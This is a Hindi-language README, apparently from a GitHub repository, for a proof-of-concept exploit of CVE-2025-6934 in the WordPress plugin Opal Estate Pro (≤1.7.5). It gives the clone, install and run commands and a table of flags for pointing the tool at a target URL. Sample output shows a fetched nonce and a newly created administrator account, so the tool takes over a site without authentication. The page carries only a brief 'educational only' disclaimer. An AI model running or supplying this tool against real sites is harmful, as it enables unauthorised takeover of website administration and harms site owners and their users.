
वर्डप्रेस Opal Estate Pro के लिए स्वचालित PoC एक्सप्लॉइट जो असुरक्षित संस्करणों का पता लगाता है, nonce प्राप्त करता है, और अनधिकृत व्यवस्थापक खाते बनाता है।
CVE-2025-6934 एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है जो वर्डप्रेस प्लगिन: Opal Estate Pro ≤ 1.7.5 को लक्षित करता है।
यह एक्सप्लॉइट बिना प्रमाणीकरण के व्यवस्थापक खाता निर्माण प्रदर्शित करता है।
अस्वीकरण: यह PoC केवल शैक्षिक उद्देश्यों के लिए है। बिना अनुमति के सिस्टम पर उपयोग न करें।
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
pip install -r requirements.txt
आवश्यकताएँ:
requests,beautifulsoup4,colorama
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337
| फ़्लैग | विवरण | आवश्यक | डिफ़ॉल्ट |
|---|---|---|---|
-u, --url | लक्ष्य साइट URL | हाँ | - |
-mail, --newmail | नए व्यवस्थापक के लिए ईमेल | हाँ | - |
-password, --newpassword | नए व्यवस्थापक के लिए पासवर्ड | हाँ | - |
-user, --username | नए व्यवस्थापक के लिए उपयोगकर्ता नाम | नहीं | administrator |
कंसोल निम्न दिखाता है:
[•][✔][✖][i]उदाहरण:
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
Username : r1337
Email : [email protected]
Password : 3xplo1tI5Fun
Role : administrator
मैं एक सक्रिय डेवलपर हूँ जिसे टूल बनाना और ज्ञान साझा करना पसंद है। आप मुझसे यहाँ संपर्क कर सकते हैं: